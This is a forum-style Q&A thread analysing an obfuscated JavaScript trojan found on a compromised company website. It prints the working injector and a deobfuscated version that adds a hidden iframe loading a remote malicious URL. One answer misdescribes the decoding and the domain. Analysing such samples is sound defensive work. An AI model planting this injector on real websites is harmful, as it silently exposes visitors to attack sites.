JavaScript analysis of trojans

I have recently spent a lot of time working with JavaScript and had begun to believe that there was no piece of JavaScript I could not debug.

Well, I was pleasantly surprised — and pissed off — today when we discovered several JavaScript redirect Trojans on our company website.

Most of the code we found I was able to parse easily, using standard unescaping to deobfuscate it and see what it does.

But one piece of code we found, shown below, has me completely stumped as to what it is doing. (The only part I can make out is that it performs some kind of string replacement.)

Would someone be kind enough to walk through the following code for me? I would like to know exactly what it is doing ...

<script>
// Obfuscated iframe injector recovered from a compromised site (analysed in
// the answers below). Almost every statement is noise: decoy locals, empty
// functions and implicit globals (x, mC, nP, h, ...) that leak into window.
// The live path is:
//   - gT is an alias for String.prototype.replace (d === 'replace'); each
//     keyword is a padded literal whose filler characters are stripped by a
//     regex: sV -> setTimeout, f -> an empty html/head/body skeleton,
//     y -> body, r -> style, bQ -> iframe, n -> createElement, k -> src,
//     z -> setAttribute, dH -> hidden, o -> visibility, e -> appendChild;
//     a() decodes the remote URL the same way.
//   - w() creates an <iframe>, sets style.visibility = hidden and src = a(),
//     and appends it to document.body.
//   - If that throws, the catch block document.write()s the skeleton page f
//     and re-runs w() via window.setTimeout after 326 ms.
// The only behaviour-relevant code is in w(), a() and the trailing kN.w() call.
function yJ() {}; this.sMZ = "sMZ"; yJ.prototype = { w: function () { var rJ = 13390; this.m = "m"; this.fP = ''; this.q = "q"; this.oJ = ""; var vS = function () { return 'vS' }; var d = 'replace'; var qB = ""; x = ''; var s = document; var xZ = "xZ"; mC = ''; var dV = "dV"; var b = window; this.p = false; this.kX = ''; nP = "nP"; var zE = ""; this.nU = false; var yV = function () { return 'yV' }; String.prototype.gT = function (l, v) { return this[d](l, v) }; this.pC = ''; var qV = false; var fPU = new Array(); h = ""; var sV = 'sKe}tKTIiWmEe}oEu}tK'.gT(/[KE\}IW]/g, ''); var xV = 43258; sT = ''; var mV = ''; this.wJ = "wJ"; var f = '<jhItImIlI I>j<IhjezaIdz ;>;<z/;hjeIaIdI>;<zb!ojdjyj ;>I<!/jbIo!d!yI>z<j/Ihjt;m;lj>!'.gT(/[\!Ijz;]/g, ''); var xB = ''; wI = "wI"; oT = false; var nQ = 49042; try { zI = ''; var bF = new Array(); var aY = function () { return 'aY' }; var rN = false; rF = ""; var cX = function () { return 'cX' }; var y = 'bToTdTy+'.gT(/[\+\]aT%]/g, ''); this.rL = ''; var vH = function () { return 'vH' }; var r = 'sStEy9l?eE'.gT(/[ES9\?m]/g, ''); yD = ""; var eA = ''; var bQ = 'i.fWrhalmlel'.gT(/[lW\.xh]/g, ''); vZ = ''; this.bG = ""; this.vL = false; var t = 'w5r[i5t[e%'.gT(/[%C5\[U]/g, ''); gI = ''; dVL = "dVL"; var n = 'cZrzeZaZtze.Ele;m;eSnzt;'.gT(/[;SZz\.]/g, ''); lH = ""; kD = "kD"; this.pH = false; var k = 's9ric9'.gT(/[9Ni~O]/g, ''); var vB = ''; var kH = function () { return 'kH' }; var qH = new Array(); aD = ''; this.eQ = false; var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, ''); var cT = ''; var kL = function () { return 'kL' }; var bR = new Array(); this.cP = 22454; var dH = 'hNi9d0d>e*n*'.gT(/[\*9N\>0]/g, ''); lG = ''; tG = 7587; hV = ''; this.oR = "oR"; var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, ''); var dC = function () {}; var eR = new Date(); var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, ''); uM = ""; var i = function () {}; this.cI = ""; tU = false; function qN() {}; xL = 57256; var c = this.a(); this.eL = ''; var rY 
= function () {}; fG = false; nO = false; this.j = ""; this.iQ = 5330; var sY = function () {}; var u = document[n](bQ); this.tH = false; zX = ""; u[r][o] = dH; var kV = "kV"; pN = ''; var yG = new Array(); this.nOE = 818; u[z](k, c); this.bQK = ""; var yU = 15629; var sM = new Array(); var eY = "eY"; var qP = ''; s[y][e](u); var lU = "lU"; var zR = false; var xS = ""; iX = 34795; function pO() {}; this.gM = ""; } catch (g) { var xI = false; this.gO = false; this.iZ = false; this.iU = false; var mQ = new Date(); var qF = function () {}; s.write(f); var tS = "tS"; function aR() {}; nA = "nA"; var xT = new Date(); mZ = false; var gN = new Array(); var wE = this; var eB = 3562; this.qE = "qE"; this.cS = false; this.vK = false; qEJ = false; this.hW = false; b[sV](function () { function bI() {}; hJ = ""; var kVQ = "kVQ"; var iG = ""; var eBS = new Array(); rA = ""; wE.w(); jY = ""; var hB = "hB"; var iZF = ''; qY = ""; jYG = ""; uK = 30969; var qD = "qD"; }, 326); this.qC = ""; var aX = function () {}; var cN = ""; } gB = false; var fF = false; this.hX = false; }, a: function () { rH = "rH"; this.bV = ''; var qW = ""; return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, ''); var sMS = new Array(); this.wL = false; uS = "uS"; function pI() {}; } }; var uI = false; var kN = new yJ(); this.aQ = "aQ"; kN.w(); hT = 15101; </script>
javascript debugging obfuscation trojan
3 answers

It includes http://fancycake.xxx/something , and this is the line where you can see it:

 return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, ''); 

You can see how taking every odd character out of this line yields a URL. I did not run this, so I'm not sure under what conditions it does so, but you can see that String.replace has been aliased as String.gT and a regular expression is applied to strip the filler characters that make the string look like garbage. If you apply the same method, picking out the odd characters, you can see that there is a hidden iframe, some JavaScript, setAttribute event handlers, etc.:

 var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, ''); var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, ''); var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, ''); 

This is how String.replace is disguised:

 var d = 'replace'; ... String.prototype.gT = function (l, v) { return this[d](l, v) }; 

Inside this function, this is the string on which gT was called, and d is the string 'replace'. Looking it up on the string, this['replace'] yields the replace() method, which is then called with gT's two arguments, and the result is returned.

Update

I cleaned up the script as follows:

  • Replaced all calls to string.gT() with the plain strings they decode to.
  • Removed any variables that are not referenced.
  • Gave the functions some sensible names.

This is the result; it should be pretty clear how it works now:

 // Cleaned-up version of the obfuscated sample: every `.gT(...)` call has been
 // replaced with the literal it decodes to and most of the decoy assignments
 // removed. Note that the console.error() in the catch block was added during
 // clean-up; the original sample swallowed the error silently.
 function FancyCake() {};
 FancyCake.prototype = {
   // Appends a hidden <iframe> pointing at getUrl() to document.body; if that
   // throws, writes a bare page skeleton and retries after 326 ms.
   embed: function () {
     var d = 'replace'; // leftover: only the gT alias in the original used it
     var s = document;
     var b = window;
     var sV = 'setTimeout';
     var f = "<html ><head ></head><body ></body></html>";
     try {
       zI = ''; // leftover from the original: implicit global, never read
       var bF = new Array(); // leftover, never read
       var y = 'body';
       var r = 'style';
       var bQ = 'iframe';
       var t = 'write'; // unused: s.write is called directly in the catch block
       var n = 'createElement';
       var k = 'src';
       var z = 'setAttribute';
       var dH = 'hidden';
       var o = 'visibility';
       var e = 'appendChild';
       var c = this.getUrl();
       var u = document[n](bQ); // document.createElement('iframe')
       u[r][o] = dH; // u.style.visibility = 'hidden'
       u[z](k, c); // u.setAttribute('src', c)
       s[y][e](u); // document.body.appendChild(u)
     } catch (e) { // this `e` is the caught error and shadows the var e above
       console.error(e);
       s.write(f); // document.write() a skeleton — presumably so document.body exists on retry
       var cake = this;
       b[sV](function () { cake.embed(); }, 326); // window.setTimeout(..., 326)
     }
   },
   // Returns the remote URL the hidden iframe loads (the indicator to block/hunt for).
   getUrl: function () {
     return "http://fancycake.net/.ph/1/";
   }
 };
 var cake = new FancyCake();
 cake.embed();

It adds an invisible iframe pointing at the following URL to your site:

 <iframe style="visibility: hidden;" src="http://fancycake.net/.ph/1/"></iframe> 

The fancycake website is flagged as an attack site and malicious by Firefox.


Run it in a JavaScript debugger; eventually the code deobfuscates itself and tries to execute. I suggest using the latest version of Firefox, possibly on a Linux box, to be safe.

